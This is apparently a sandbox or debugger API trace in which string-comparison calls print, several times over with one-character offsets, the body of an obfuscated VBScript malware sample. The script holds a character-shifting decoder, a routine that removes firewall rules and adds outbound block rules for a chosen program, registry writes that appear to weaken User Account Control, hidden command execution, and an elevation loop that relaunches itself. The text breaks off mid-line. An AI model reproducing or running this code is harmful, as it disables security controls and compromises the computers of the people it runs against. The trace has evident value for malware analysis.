bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.296] wcsncmp (_String1="c(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.296] wcsncmp (_String1="(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.296] wcsncmp (_String1="Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0226.296] wcsncmp (_String1="id(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 